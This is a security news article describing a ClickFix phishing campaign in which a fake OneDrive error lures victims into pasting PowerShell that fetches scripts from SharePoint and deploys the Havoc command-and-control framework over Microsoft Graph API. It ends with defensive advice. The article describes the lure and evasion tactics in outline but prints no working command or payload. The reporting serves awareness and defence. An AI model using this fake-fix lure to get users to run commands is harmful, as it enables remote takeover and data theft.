New ClickFix Phishing Campaign Deploys Havoc Framework via PowerShell
Overview
A newly discovered ClickFix phishing campaign is tricking users into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework for remote access. Researchers from Fortinet’s Fortiguard Labs identified the attack, which abuses Microsoft cloud services, including SharePoint and Graph API, to evade detection and blend into legitimate traffic.
ClickFix attacks use fake error messages to convince victims to manually copy and execute malicious PowerShell commands, leading to system compromise and lateral movement within corporate networks.
How the ClickFix Attack Works
1️⃣ Phishing Email & Fake Error Message
- Victims receive a phishing email with an HTML attachment (‘Documents.html’).
- Opening the file displays a fake OneDrive error (0x8004de86).
ClickFix phishing attachment
Source: BleepingComputer
- Users are prompted to fix the issue by copying a PowerShell command into their clipboard.
Phishing attachment displaying fix instructions
Source: BleepingComputer
2️⃣ Malicious PowerShell Execution
- The PowerShell script retrieves another script from the attacker’s SharePoint server.
Malicious PowerShell command that was shared as a fix
Source: BleepingComputer
- Sandbox Evasion: The script checks for a sandbox environment before execution.
- Registry Modification: A flag is added to the registry, marking that the script was executed.
- Python Deployment: If Python is missing, the script installs it to execute additional payloads.
3️⃣ Deployment of the Havoc C2 Framework
- A Python script is downloaded and executed to deploy Havoc as an injected DLL.
- Havoc is a post-exploitation framework similar to Cobalt Strike, used for remote control, privilege escalation, and lateral movement.
- Graph API Evasion: Communication between the infected device and the attacker’s C2 infrastructure is routed through Microsoft Graph API, disguising malicious traffic as legitimate cloud activity.
See Also: So, you want to be a hacker?
Offensive Security, Bug Bounty Courses
Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.
Why This Attack Is Dangerous
✅ Social Engineering Tactics: Relies on manual user action, bypassing traditional email filters.
✅ Abuses Trusted Microsoft Services: SharePoint & Graph API are leveraged for command execution & data exfiltration.
✅ Evasive Network Traffic: Attack traffic is embedded within legitimate cloud service communications, making detection difficult.
✅ Havoc Post-Exploitation: Attackers gain full remote access, enabling network compromise, data theft, and ransomware deployment.
Trending: Recon Tool: getJS
How to Protect Against ClickFix Attacks
🔒 User Awareness Training: Educate employees about ClickFix tactics and the risks of copying and executing PowerShell commands from unknown sources.
🛡️ Restrict PowerShell Execution: Implement PowerShell logging, script-blocking policies, and AMSI integration to detect malicious execution.
📊 Monitor Microsoft Cloud Services: Enable advanced logging for Microsoft Graph API and SharePoint activity to detect anomalies.
🚨 Endpoint Security & EDR Solutions: Deploy behavioral threat detection tools to flag unexpected PowerShell and Python activity.
🔍 Email Filtering & Attachment Analysis: Block HTML attachments in emails and inspect embedded JavaScript or PowerShell commands.
Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]
Source: bleepingcomputer.com
Recent News
Offensive Security & Ethical Hacking Course
Begin the learning curve of hacking now!
Information Security Solutions
Find out how Pentesting Services can help you.
